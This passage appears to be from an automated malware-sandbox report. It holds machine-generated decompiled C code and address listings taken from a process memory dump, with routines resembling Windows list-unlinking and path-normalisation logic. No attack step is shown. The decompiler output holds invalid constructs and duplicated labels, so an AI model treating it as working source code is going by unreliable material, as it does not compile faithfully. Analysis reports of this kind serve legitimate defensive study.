																		goto L24;
																	}
																	_t432 =  *(_t423 + 4);
																	if(_t397 != 0) {
																		if(_t432 != 0) {
																			_t432 = _t432 ^ _t423;
																		}
																	}
																	_v16 = 0 | _t432 == _t446;
																	_t395 = _a4;
																	goto L17;
																}
																L110:
																_t423 = _t431;
																goto L111;
															} else {
																_t306 = _t308 & 0x000000fe;
																 *(_t423 + 8) = _t306;
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																goto L24;
															}
														}
														L18:
														_t426 = _t452;
														goto L19;
													}
												}
												L13:
												_t306 = _t426;
												goto L14;
											}
										}
									}
									L41:
									_t366 = _v12;
									_v20 = _t452;
									goto L42;
								}
								L37:
								_t483 = _v24;
								goto L38;
							}
						}
					}
					L28:
					_t428 = _t452;
					goto L29;
				}
				_t385 = _v5;
				_t422 =  *(_t444 + 8) & 0xfffffffc;
				if(_t385 != 0) {
					if(_t422 != 0) {
						_t422 = _t422 ^ _t444;
					}
				}
				_v12 = _t444;
				if(_t422 == 0) {
					if(_t426 != 0) {
						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
					}
					_t425 = _a4;
					if( *_t425 != _t444) {
						goto L174;
					} else {
						_t425[4] = _t426;
						_t306 = _t425[4] & 0x00000001;
						if(_t306 != 0) {
							_t425[4] = _t425[4] | 0x00000001;
						}
						 *_t425 = _t426;
						goto L24;
					}
				} else {
					_t452 =  *(_t422 + 4);
					if(_t385 != 0) {
						if(_t452 != 0) {
							_t452 = _t452 ^ _t422;
						}
					}
					if(_t452 == _t444) {
						_v16 = 1;
						L11:
						_t373 =  *(_t444 + 8);
						goto L12;
					} else {
						_t387 =  *_t422;
						if(_v5 != 0) {
							if(_t387 != 0) {
								_t387 = _t387 ^ _t422;
							}
						}
						if(_t387 != _t444) {
							goto L174;
						} else {
							_t488 = _a4;
							_v16 = _v16 & 0x00000000;
							_t388 =  *(_t488 + 4);
							_v24 = _t388;
							if((_t388 & 0xfffffffe) == _t444) {
								if(_t426 != 0) {
									 *(_t488 + 4) = _t426;
									if((_v24 & 0x00000001) != 0) {
										_t390 = _t426;
										L228:
										 *(_t488 + 4) = _t390 | 0x00000001;
									}
									goto L11;
								}
								 *(_t488 + 4) = _t422;
								if((_v24 & 0x00000001) == 0) {
									goto L11;
								} else {
									_t390 = _t422;
									goto L228;
								}
							}
							goto L11;
						}
					}
				}
			}

0x0141f90b
0x0141f911
0x0141f917
0x0141f919
0x0141f91c
0x01475d63
0x01475d69
0x01475d69
0x01475d63
0x0141f922
0x0141f927
0x01475d72
0x01475d78
0x01475d78
0x01475d72
0x0141f92d
0x0141f931
0x0141fa2d
0x0141fa2d
0x0141f939
0x0141f940
0x0141f944
0x0141fa37
0x0141fa39
0x0141fa3c
0x0141fa3e
0x0141fa41
0x0141fa48
0x0141fe68
0x0141fe6c
0x0141fe6c
0x0141fe78
0x0141fe78
0x0141fe7a
0x0141fe7a
0x0141fe7e
0x0141fe6e
0x0141fe6e
0x0141fe72
0x00000000
0x00000000
0x00000000
0x0141fe80
0x0141fe80
0x0141fe83
0x00000000
0x0141fe83
0x01475d7f
0x01475d81
0x00000000
0x00000000
0x01475d87
0x00000000
0x01475d87
0x0141fa4e
0x0141fa50
0x01475d90
0x00000000
0x00000000
0x01475d98
0x0141fa58
0x0141fa58
0x0141fa5d
0x0141fa60
0x0141fa63
0x0141fa69
0x0141fa6b
0x0141fa6e
0x0141fa71
0x01475da1
0x01475da7
0x01475da7
0x01475da1
0x0141fa79
0x01420071
0x01420073
0x01420074
0x00000000
0x0141fa7f
0x0141fa83
0x0141fa85
0x01475dae
0x01475dae
0x0141fa8b
0x0141fa8f
0x0141fa98
0x0141faa1
0x0141faa4
0x0141faa6
0x0141faa9
0x0141faac
0x01475db7
0x01475dbd
0x01475dbd
0x01475db7
0x0141fab4
0x00000000
0x0141faba
0x0141fabc
0x0141fac2
0x0141fac5
0x0141fac7
0x0141fac7
0x0141fad6
0x0141fad9
0x0141fadf
0x0141fae2
0x0141fae4
0x0141fae7
0x0141faea
0x0141faed
0x01475dc4
0x01475dc9
0x00000000
0x00000000
0x01475dcf
0x0141faf6
0x0141fafa
0x0141fafc
0x0141fafc
0x0141fafe
0x0141fb01
0x0141fb09
0x0141fb0c
0x0141fb12
0x0141fb14
0x0141fb17
0x01475dd6
0x01475dd9
0x01475dde
0x00000000
0x00000000
0x01475de4
0x01475de7
0x0141fb29
0x0141fb2c
0x01475df3
0x01475df6
0x01475e06
0x01475e0c
0x01475e0f
0x01475e11
0x00000000
0x01475e1f
0x00000000
0x01475e1f
0x01475e11
0x01475df8
0x01475dfb
0x01475e00
0x00000000
0x00000000
0x01475e02
0x00000000
0x01475e02
0x0141fb32
0x0141fb35
0x0141fb3c
0x01475e26
0x01475e28
0x01475e28
0x01475e2e
0x01475e3c
0x01475e3c
0x01475e2e
0x0141fb45
0x0141fb47
0x0141fb53
0x0141fb56
0x0141fb59
0x0141fb5c
0x0141fb65
0x0142000d
0x00000000
0x0142000f
0x0142000f
0x00000000
0x0142000f
0x0141fb6b
0x0141fb6e
0x0141fb71
0x0141fb73
0x0141fb76
0x01475e45
0x01475e4b
0x01475e4b
0x01475e45
0x0141fb80
0x0141fb83
0x01475e54
0x01475e5a
0x01475e5a
0x01475e54
0x0141fb89
0x0141fb98
0x0141fb9b
0x0141fb9e
0x0141fba0
0x01475e63
0x01475e69
0x01475e69
0x01475e63
0x0141fba8
0x00000000
0x0141fbae
0x0141fbb2
0x01475e70
0x0141fbb8
0x0141fbb8
0x0141fbb8
0x0141fbbd
0x0141fbbf
0x0141fbbf
0x0141f9a8
0x0141f9a8
0x0141f9ad
0x0141f9b4
0x01475eda
0x00000000
0x00000000
0x01475ee2
0x0141f9bc
0x0141f9bc
0x0141f9bf
0x0141f9c4
0x0141fde6
0x0141fde9
0x0141fdec
0x0141fdef
0x0141fdf2
0x01475eeb
0x01475ef1
0x01475ef1
0x01475eeb
0x0141fdfa
0x00000000
0x0141fe00
0x0141fe04
0x01475efa
0x01475f00
0x01475f00
0x01475efa
0x0141fe0a
0x0141fa24
0x0141fa2a
0x0141fa2a
0x0141fdfa
0x0141f9cd
0x00000000
0x0141f9cf
0x0141f9cf
0x0141f9d1
0x0141f9d4
0x0141f9d7
0x0141f9d9
0x0141f9dc
0x0141f9df
0x0141f9e2
0x0141f9e7
0x01475f09
0x00000000
0x00000000
0x01475f11
0x0141f9ef
0x0141f9f3
0x0141fed5
0x0141fed8
0x0141fedb
0x01475f1a
0x01475f20
0x01475f20
0x01475f1a
0x0141fee3
0x00000000
0x0141fee9
0x0141feeb
0x01475f29
0x01475f2f
0x01475f2f
0x01475f29
0x0141fef3
0x00000000
0x0141fef9
0x0141fefc
0x0141ff01
0x01475f38
0x01420052
0x01420054
0x00000000
0x01420056
0x01420056
0x0141ff40
0x0141ff42
0x01475f6e
0x01475f74
0x01475f74
0x01475f6e
0x0141ff50
0x0141ff56
0x0141ff5b
0x01475f7d
0x00000000
0x00000000
0x01475f83
0x00000000
0x0141ff61
0x0141ff61
0x0141ff63
0x01420021
0x01420026
0x0142002b
0x0142007e
0x01420080
0x01420080
0x0142007e
0x0142002f
0x00000000
0x01420031
0x01420033
0x01420086
0x01420035
0x01420035
0x01420035
0x0142003c
0x00000000
0x0142003c
0x0142002f
0x0141ff69
0x0141ff6b
0x01475f8c
0x01475f92
0x01475f92
0x01475f8c
0x0141ff74
0x0141ff77
0x0141ff7b
0x01475f99
0x01475f9b
0x0141ff81
0x0141ff81
0x0141ff83
0x0141ff83
0x0141ff88
0x0141ff8b
0x0141ff90
0x0141ff92
0x0141ff92
0x0141ff9c
0x0141ffa2
0x0141ffa6
0x0141ffaa
0x0141ffad
0x0141ffb2
0x01475fa4
0x01475faa
0x01475faa
0x01475fa4
0x0141ffb8
0x00000000
0x0141ffb8
0x0141ff5b
0x01420054
0x01475f3e
0x01475f3e
0x0141ff09
0x00000000
0x00000000
0x0141ff0f
0x0141ff14
0x01475f47
0x01475f4d
0x01475f4d
0x01475f47
0x0141ff1c
0x01420046
0x01420076
0x01420078
0x00000000
0x01420048
0x01420048
0x0142004a
0x0142004a
0x00000000
0x0142004a
0x0141ff22
0x0141ff22
0x0141ff26
0x01475f56
0x01475f5c
0x01475f5c
0x01475f56
0x0141ff2e
0x00000000
0x0141ff34
0x0141ff36
0x01475f65
0x0141ff3c
0x0141ff3c
0x0141ff3c
0x0141ff3e
0x00000000
0x0141ff3e
0x0141ff2e
0x0141ff1c
0x0141fef3
0x0141fee3
0x0141f9f9
0x0141f9f9
0x0141f9fb
0x0141f9ff
0x0141fbd5
0x01475fb1
0x01475fb1
0x0141fbdf
0x00000000
0x0141fbe5
0x0141fbe5
0x0141fbe8
0x0141fbed
0x01475fdf
0x0141fc01
0x0141fc01
0x0141fc04
0x0141fc09
0x01475fee
0x01475ff4
0x01475ff4
0x01475fee
0x0141fc0f
0x0141fc13
0x0141fc1d
0x0141fc20
0x0141fc23
0x0141fc26
0x0141fc2b
0x01475ffd
0x01476003
0x01476003
0x01475ffd
0x0141fc33
0x00000000
0x0141fc39
0x0141fc3b
0x0141fc3e
0x0141fc41
0x0141fc46
0x0147600c
0x01476012
0x01476012
0x0147600c
0x0141fc4e
0x00000000
0x0141fc54
0x0141fc54
0x0141fc59
0x0147601b
0x01476021
0x01476021
0x0147601b
0x0141fc61
0x00000000
0x0141fc67
0x0141fc6a
0x0141fc6f
0x0147602a
0x01476030
0x01476030
0x0147602a
0x0141fc77
0x00000000
0x0141fc7d
0x0141fc7f
0x0141fc81
0x0141fc85
0x0141fc87
0x0141fc87
0x0141fc8c
0x0141fc8f
0x0141fc94
0x01476039
0x0141fc9c
0x0141fca4
0x0141fcaa
0x0141fcaf
0x01476046
0x0141fcbd
0x0141fcbf
0x0147606d
0x01476073
0x01476073
0x0147606d
0x0141fcc8
0x0141fccd
0x0141fccf
0x0141fcd3
0x0141fcd5
0x0141fcd5
0x0141fcde
0x0141fce1
0x0141fce3
0x0141fce3
0x0141fce8
0x0141fcf0
0x0141fcf2
0x0141fcf5
0x0141fcf7
0x0141fcff
0x0141fd02
0x0141fd06
0x0141fd11
0x0141fd14
0x0141fd17
0x0147607c
0x01476082
0x01476082
0x0147607c
0x0141fd1f
0x00000000
0x0141fd25
0x0141fd28
0x0141fd2d
0x0147608b
0x01476091
0x01476091
0x0147608b
0x0141fd35
0x00000000
0x0141fd3b
0x0141fd3e
0x0141fd43
0x0147609a
0x01420016
0x01420018
0x00000000
0x0142001a
0x0142001a
0x0141fd82
0x0141fd84
0x014760d9
0x014760df
0x014760df
0x014760d9
0x0141fd8d
0x0141fd95
0x0141fd98
0x0141fd9d
0x014760e8
0x00000000
0x00000000
0x014760ee
0x00000000
0x0141fda3
0x0141fda3
0x0141fda5
0x0141fe8b
0x0141fe90
0x0141fe95
0x014760f7
0x014760fd
0x014760fd
0x014760f7
0x0141fe9d
0x00000000
0x0141fea3
0x0141fea5
0x01476106
0x0141feab
0x0141feab
0x0141feab
0x0141feb2
0x0141feb5
0x00000000
0x0141feb5
0x0141fe9d
0x0141fdab
0x0141fdad
0x0147610f
0x01476115
0x01476115
0x0147610f
0x0141fdb6
0x0141fdbb
0x0147611e
0x01476120
0x0141fdc1
0x0141fdc1
0x0141fdc5
0x0141fdc5
0x0141fdc7
0x0141fdcc
0x0141fdce
0x0141fdce
0x0141fdd6
0x0141fdd8
0x00000000
0x0141fdd8
0x0141fd9d
0x01420018
0x014760a0
0x014760a0
0x0141fd4b
0x00000000
0x00000000
0x0141fd51
0x0141fd56
0x014760a9
0x014760af
0x014760af
0x014760a9
0x0141fd5e
0x0141febf
0x014760b8
0x0141fec5
0x0141fec5
0x0141fec5
0x0141fec7
0x00000000
0x0141fd64
0x0141fd64
0x0141fd68
0x014760c1
0x014760c7
0x014760c7
0x014760c1
0x0141fd70
0x00000000
0x0141fd76
0x0141fd78
0x014760d0
0x0141fd7e
0x0141fd7e
0x0141fd7e
0x0141fd80
0x00000000
0x0141fd80
0x0141fd70
0x0141fd5e
0x0141fd35
0x0141fd1f
0x0147604c
0x0147604c
0x0141fcb7
0x0141ffc0
0x0141ffc3
0x0141ffc6
0x0141ffcb
0x01476055
0x0147605b
0x0147605b
0x01476055
0x0141ffd3
0x00000000
0x0141ffd9
0x0141ffdb
0x01476064
0x0141ffe1
0x0141ffe1
0x0141ffe1
0x0141ffe3
0x0141ffe7
0x0141ffed
0x00000000
0x0141ffed
0x0141ffd3
0x00000000
0x0141fcb7
0x0147603f
0x0141fc9a
0x00000000
0x0141fc9a
0x0141fc77
0x0141fc61
0x0141fc4e
0x0141fc33
0x01475fe5
0x01475fe5
0x0141fbf5
0x00000000
0x00000000
0x00000000
0x00000000
0x0141fbf5
0x0141fbdf
0x0141fa05
0x0141fa05
0x0141fa0a
0x0141fe14
0x01475fb8
0x01475fb8
0x0141fe1e
0x00000000
0x0141fe24
0x00000000
0x0141fe24
0x0141fe1e
0x0141fa10
0x0141fa10
0x0141fa15
0x0141fe29
0x0141fe2d
0x0141fe35
0x0141fe38
0x0141fe3b
0x01475fc1
0x00000000
0x00000000
0x01475fc7
0x0141fe43
0x0141fe45
0x00000000
0x00000000
0x0141fe4b
0x0141fe50
0x01475fd0
0x01475fd6
0x01475fd6
0x01475fd0
0x0141fe5d
0x0141fe60
0x00000000
0x0141fe60
0x0141fe41
0x0141fe41
0x00000000
0x0141fa1b
0x0141fa1b
0x0141fa1d
0x0141fa20
0x00000000
0x0141fa20
0x0141fa15
0x0141f9ed
0x0141f9ed
0x00000000
0x0141f9ed
0x0141f9cd
0x0141f9ba
0x0141f9ba
0x00000000
0x0141f9ba
0x0141fba8
0x0141fb65
0x0141fb1d
0x0141fb23
0x0141fb26
0x00000000
0x0141fb26
0x0141faf3
0x0141faf3
0x00000000
0x0141faf3
0x0141fab4
0x0141fa79
0x0141fa56
0x0141fa56
0x00000000
0x0141fa56
0x0141f94d
0x0141f950
0x0141f955
0x01475e79
0x01475e7f
0x01475e7f
0x01475e79
0x0141f95b
0x0141f960
0x01475e88
0x01475e8a
0x01475e8a
0x01475e8e
0x01475e93
0x00000000
0x01475e99
0x01475e9c
0x01475e9f
0x01475ea1
0x01475ea3
0x01475ea3
0x01475ea7
0x00000000
0x01475ea7
0x0141f966
0x0141f966
0x0141f96b
0x01475eb0
0x01475eb6
0x01475eb6
0x01475eb0
0x0141f973
0x0141fbc7
0x0141f9a5
0x0141f9a5
0x00000000
0x0141f979
0x0141f97d
0x0141f97f
0x01475ebf
0x01475ec5
0x01475ec5
0x01475ebf
0x0141f987
0x00000000
0x0141f98d
0x0141f98d
0x0141f990
0x0141f994
0x0141f997
0x0141f99f
0x0141fff7
0x01420061
0x01420064
0x0142006a
0x01475ece
0x01475ed0
0x01475ed0
0x00000000
0x01420064
0x0141fffd
0x01420000
0x00000000
0x01420006
0x01475ecc
0x00000000
0x01475ecc
0x01420000
0x00000000
0x0141f99f
0x0141f987
0x0141f973

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
Instruction ID: cca5c8cd48ca5985881db7f2382c81e7c927568b204a5cd85958b86998172891
Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
Instruction Fuzzy Hash: 3562F672A047628BDB22CE6C84402BBBBB1AF45660F19859BCC559F37AD371DC4F8780

Uniqueness

Uniqueness Score: -1.00%

Function 01436E30, Relevance: .5, Instructions: 481
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E01436E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed short _v34;
				intOrPtr _v36;
				signed short _v38;
				signed short _v40;
				char _v41;
				signed int _v48;
				short _v50;
				signed int _v52;
				signed short _v54;
				signed int _v56;
				char _v57;
				signed int _v64;
				signed int _v68;
				signed short _v70;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed short _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				char _v136;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t312;
				signed int _t313;
				char* _t315;
				unsigned int _t316;
				signed int _t317;
				short* _t319;
				void* _t320;
				signed int _t321;
				signed short _t327;
				signed int _t328;
				signed int _t335;
				signed short* _t336;
				signed int _t337;
				signed int _t338;
				signed int _t349;
				signed short _t352;
				signed int _t357;
				signed int _t360;
				signed int _t363;
				void* _t365;
				signed int _t366;
				signed short* _t367;
				signed int _t369;
				signed int _t375;
				signed int _t379;
				signed int _t384;
				signed int _t386;
				void* _t387;
				signed short _t389;
				intOrPtr* _t392;
				signed int _t397;
				unsigned int _t399;
				signed int _t401;
				signed int _t402;
				signed int _t407;
				void* _t415;
				signed short _t417;
				unsigned int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				intOrPtr* _t433;
				signed int _t435;
				void* _t436;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed short _t443;
				void* _t444;
				signed int _t445;
				signed int _t446;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;

				_t425 = __edx;
				_push(0xfffffffe);
				_push(0x14efca8);
				_push(0x14617f0);
				_push( *[fs:0x0]);
				_t312 =  *0x150d360;
				_v12 = _v12 ^ _t312;
				_t313 = _t312 ^ _t453;
				_v32 = _t313;
				_push(_t313);
				 *[fs:0x0] =  &_v20;
				_v116 = __edx;
				_t443 = __ecx;
				_v88 = __ecx;
				_t386 = _a4;
				_t433 = _a8;
				_v112 = _t433;
				_t315 = _a12;
				_v64 = _t315;
				_t392 = _a16;
				_v108 = _t392;
				if(_t433 != 0) {
					 *_t433 = 0;
				}
				if(_t315 != 0) {
					 *_t315 = 0;
				}
				if(_t425 > 0xffff) {
					_v116 = 0xffff;
				}
				 *_t392 = 0;
				 *((intOrPtr*)(_t392 + 4)) = 0;
				_t316 =  *_t443 & 0x0000ffff;
				_v104 = _t316;
				_t435 = _t316 >> 1;
				_v120 = _t435;
				if(_t435 == 0) {
					L124:
					_t317 = 0;
					goto L60;
				} else {
					_t319 =  *((intOrPtr*)(_t443 + 4));
					if( *_t319 != 0) {
						_t397 = _t435;
						_t320 = _t319 + _t435 * 2;
						_t425 = _t320 - 2;
						while(_t397 != 0) {
							if( *_t425 == 0x20) {
								_t397 = _t397 - 1;
								_t425 = _t425 - 2;
								continue;
							}
							if(_t397 == 0) {
								goto L124;
							}
							_t321 =  *(_t320 - 2) & 0x0000ffff;
							if(_t321 == 0x5c || _t321 == 0x2f) {
								_v57 = 0;
							} else {
								_v57 = 1;
							}
							_t399 = _v116 >> 1;
							_v92 = _t399;
							_v128 = _t399;
							E0145FA60(_t386, 0, _v116);
							_v56 = 0;
							_v52 = 0;
							_v50 = _v92 + _v92;
							_v48 = _t386;
							_t327 = E014374C0(_t443);
							if(_t327 != 0) {
								_t389 = _t327 >> 0x10;
								_t328 = _t327 & 0x0000ffff;
								_v112 = _t328;
								_t437 = _v64;
								if(_t437 == 0) {
									L122:
									_t438 = _t328 + 8;
									_t401 = _v92;
									if(_t438 >= (_t401 + _t401 & 0x0000ffff)) {
										_t209 = _t438 + 2; // 0xddeeddf0
										_t402 = _t209;
										asm("sbb eax, eax");
										_t317 =  !0xffff & _t402;
									} else {
										E01449BC6( &_v52, 0x13f1080);
										_t425 =  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2;
										E01459377( &_v52,  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2, _v112);
										_t317 = _t438;
									}
									goto L60;
								}
								if(_t389 != 0) {
									_t425 = _t389;
									_t335 = E014946A7(_t443, _t389, _t437);
									if(_t335 < 0) {
										goto L124;
									}
									if( *_t437 != 0) {
										goto L124;
									}
									_t328 = _v112;
								}
								goto L122;
							} else {
								_t425 = _t443;
								_t336 =  *(_t425 + 4);
								_t407 =  *_t425 & 0x0000ffff;
								if(_t407 < 2) {
									L17:
									if(_t407 < 4 ||  *_t336 == 0 || _t336[1] != 0x3a) {
										_t337 = 5;
									} else {
										if(_t407 < 6) {
											L98:
											_t337 = 3;
											L23:
											 *_v108 = _t337;
											_t409 = 0;
											_v72 = 0;
											_v68 = 0;
											_v64 = 0;
											_v84 = 0;
											_v41 = 0;
											_t445 = 0;
											_v76 = 0;
											_v8 = 0;
											if(_t337 != 2) {
												_t338 = _t337 - 1;
												if(_t338 > 6) {
													L164:
													_t446 = 0;
													_v64 = 0;
													_t439 = _v92;
													goto L59;
												}
												switch( *((intOrPtr*)(_t338 * 4 +  &M0143749C))) {
													case 0:
														__ecx = 0;
														__eflags = 0;
														_v124 = 0;
														__esi = 2;
														while(1) {
															_v100 = __esi;
															__eflags = __esi - __edi;
															if(__esi >= __edi) {
																break;
															}
															__eax =  *(__edx + 4);
															__eax =  *( *(__edx + 4) + __esi * 2) & 0x0000ffff;
															__eflags = __eax - 0x5c;
															if(__eax == 0x5c) {
																L140:
																__ecx = __ecx + 1;
																_v124 = __ecx;
																__eflags = __ecx - 2;
																if(__ecx == 2) {
																	break;
																}
																L141:
																__esi = __esi + 1;
																continue;
															}
															__eflags = __eax - 0x2f;
															if(__eax != 0x2f) {
																goto L141;
															}
															goto L140;
														}
														__eax = __esi;
														_v80 = __esi;
														__eax =  *(__edx + 4);
														_v68 =  *(__edx + 4);
														__eax = __esi + __esi;
														_v72 = __ax;
														__eax =  *(__edx + 2) & 0x0000ffff;
														_v70 = __ax;
														_v76 = __esi;
														goto L80;
													case 1:
														goto L164;
													case 2:
														__eax = E014152A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
														} else {
															__ebx = __eax + 0xc;
														}
														 *(__ebx + 4) =  *( *(__ebx + 4)) & 0x0000ffff;
														__eax = L01422600( *( *(__ebx + 4)) & 0x0000ffff);
														__si = __ax;
														_v88 =  *(_v88 + 4);
														__ecx =  *( *(_v88 + 4)) & 0x0000ffff;
														__eax = L01422600( *( *(_v88 + 4)) & 0x0000ffff);
														_v54 = __ax;
														__eflags = __ax - __ax;
														if(__eflags != 0) {
															__cx = __ax;
															L01494735(__ecx, __edx, __eflags) = 0x3d;
															_v40 = __ax;
															__si = _v54;
															_v38 = __si;
															_v36 = 0x3a;
															 &_v40 =  &_v136;
															E0145BB40(__ecx,  &_v136,  &_v40) =  &_v52;
															__eax =  &_v136;
															__eax = E01442010(__ecx, 0,  &_v136,  &_v52);
															__eflags = __eax;
															if(__eax >= 0) {
																__ax = _v52;
																_v56 = __eax;
																__edx = __ax & 0x0000ffff;
																__ecx = __edx;
																__ecx = __edx >> 1;
																_v100 = __ecx;
																__eflags = __ecx - 3;
																if(__ecx <= 3) {
																	L155:
																	__ebx = _v48;
																	L156:
																	_v72 = __ax;
																	goto L119;
																}
																__eflags = __ecx - _v92;
																if(__ecx >= _v92) {
																	goto L155;
																}
																__esi = 0x5c;
																__ebx = _v48;
																 *(__ebx + __ecx * 2) = __si;
																__eax = __edx + 2;
																_v56 = __edx + 2;
																_v52 = __ax;
																goto L156;
															}
															__eflags = __eax - 0xc0000023;
															if(__eax != 0xc0000023) {
																__eax = 0;
																_v52 = __ax;
																_v40 = __si;
																_v38 = 0x5c003a;
																_v34 = __ax;
																__edx =  &_v40;
																__ecx =  &_v52;
																L01494658(__ecx,  &_v40) = 8;
																_v72 = __ax;
																__ebx = _v48;
																__ax = _v52;
																_v56 = 8;
																goto L119;
															}
															__ax = _v52;
															_v56 = __eax;
															__eax = __ax & 0x0000ffff;
															__eax = (__ax & 0x0000ffff) + 2;
															_v64 = __eax;
															__eflags = __eax - 0xffff;
															if(__eax <= 0xffff) {
																_v72 = __ax;
																__ebx = _v48;
																goto L119;
															}
															__esi = 0;
															_v64 = 0;
															__ebx = _v48;
															__edi = _v92;
															goto L58;
														} else {
															__eax =  *__ebx;
															_v72 =  *__ebx;
															__eax =  *(__ebx + 4);
															_v68 =  *(__ebx + 4);
															__edx =  &_v72;
															__ecx =  &_v52;
															__eax = E01449BC6(__ecx,  &_v72);
															__ebx = _v48;
															__eax = _v52 & 0x0000ffff;
															_v56 = _v52 & 0x0000ffff;
															L119:
															__eax = 3;
															_v80 = 3;
															__esi = 2;
															_v76 = 2;
															__edx = _v88;
															goto L25;
														}
													case 3:
														__eax = E014152A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
															__eflags = __ebx;
															__esi = _v76;
														} else {
															__ebx = __eax + 0xc;
														}
														__ecx = __ebx;
														__eax = L014183AE(__ebx);
														_v80 = __eax;
														__ecx =  *__ebx;
														_v72 =  *__ebx;
														__ecx =  *(__ebx + 4);
														_v68 = __ecx;
														__eflags = __eax - 3;
														if(__eax == 3) {
															__eax = 4;
															_v72 = __ax;
														} else {
															__ecx = __eax + __eax;
															_v72 = __cx;
														}
														goto L80;
													case 4:
														_t340 = E014152A5(0);
														_v84 = _t340;
														_v41 = 1;
														__eflags = _t340;
														if(_t340 == 0) {
															_t428 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
															_t445 = _v76;
														} else {
															_t428 = _t340 + 0xc;
															 *((intOrPtr*)(_v108 + 4)) =  *((intOrPtr*)(_t340 + 0x14));
														}
														_v72 =  *_t428;
														_v68 = _t428[2];
														_v80 = L014183AE(_t428);
														L80:
														E01449BC6( &_v52,  &_v72);
														_t386 = _v48;
														_v56 = _v52 & 0x0000ffff;
														_t425 = _v88;
														goto L25;
													case 5:
														__eax = 4;
														_v80 = 4;
														__esi = 4;
														_v76 = 4;
														__eflags = __edi - 4;
														if(__edi < 4) {
															__esi = __edi;
															_v76 = __esi;
														}
														__eax =  *0x13f1080;
														_v72 =  *0x13f1080;
														__eax =  *0x13f1084;
														_v68 =  *0x13f1084;
														__edx =  &_v72;
														__ecx =  &_v52;
														__eax = E01449BC6(__ecx,  &_v72);
														__eax = _v52 & 0x0000ffff;
														_v56 = __eax;
														__edx = _v88;
														__ebx = _v48;
														__eflags = __eax - 6;
														if(__eax >= 6) {
															__eax =  *(__edx + 4);
															__ax =  *((intOrPtr*)(__eax + 4));
															 *(__ebx + 4) =  *((intOrPtr*)(__eax + 4));
														}
														__eax = _v108;
														__eflags =  *_v108 - 7;
														if( *_v108 == 7) {
															_v57 = 0;
														}
														goto L25;
												}
											} else {
												_v80 = 3;
												L25:
												_t349 = _v104 + (_v72 & 0x0000ffff) - _t445 + _t445;
												_v104 = _t349;
												_t415 = _t349 + 2;
												if(_t415 > _v116) {
													if(_t435 <= 1) {
														if( *( *(_t425 + 4)) != 0x2e) {
															goto L72;
														}
														if(_t435 != 1) {
															asm("sbb esi, esi");
															_t446 =  !_t445 & _v104;
															_v64 = _t446;
															_t439 = _v92;
															L58:
															_t409 = _v84;
															L59:
															_v8 = 0xfffffffe;
															E0143746D(_t386, _t409, _t439, _t446);
															_t317 = _t446;
															L60:
															 *[fs:0x0] = _v20;
															_pop(_t436);
															_pop(_t444);
															_pop(_t387);
															return E0145B640(_t317, _t387, _v32 ^ _t453, _t425, _t436, _t444);
														}
														_t417 = _v72;
														if(_t417 != 8) {
															if(_v116 >= (_t417 & 0x0000ffff)) {
																_t352 = _v56;
																_t418 = _t352 & 0x0000ffff;
																_v104 = _t418;
																_t419 = _t418 >> 1;
																_v100 = _t419;
																if(_t419 != 0) {
																	if( *((short*)(_t386 + _t419 * 2 - 2)) == 0x5c) {
																		_t352 = _v104 + 0xfffffffe;
																		_v56 = _t352;
																		_v52 = _t352;
																	}
																}
																L27:
																_t420 = 0;
																_v100 = 0;
																L28:
																L28:
																if(_t420 < (_t352 & 0x0000ffff) >> 1) {
																	goto L69;
																} else {
																	_t422 = (_v56 & 0x0000ffff) >> 1;
																	_v96 = _t422;
																}
																while(_t445 < _t435) {
																	_t363 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																	if(_t363 == 0x5c) {
																		L44:
																		if(_t422 == 0) {
																			L46:
																			 *(_t386 + _t422 * 2) = 0x5c;
																			_t422 = _t422 + 1;
																			_v96 = _t422;
																			L43:
																			_t445 = _t445 + 1;
																			_v76 = _t445;
																			continue;
																		}
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			goto L43;
																		}
																		goto L46;
																	}
																	_t365 = _t363 - 0x2e;
																	if(_t365 == 0) {
																		_t126 = _t445 + 1; // 0x2
																		_t366 = _t126;
																		_v104 = _t366;
																		if(_t366 == _t435) {
																			goto L43;
																		}
																		_t367 =  *(_t425 + 4);
																		_t440 =  *(_t367 + 2 + _t445 * 2) & 0x0000ffff;
																		_v108 = _t440;
																		_t435 = _v120;
																		if(_t440 != 0x5c) {
																			if(_v108 == 0x2f) {
																				goto L83;
																			}
																			if(_v108 != 0x2e) {
																				L35:
																				while(_t445 < _t435) {
																					_t369 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																					if(_t369 == 0x5c || _t369 == 0x2f) {
																						if(_t445 < _t435) {
																							if(_t422 >= 2) {
																								if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x2e) {
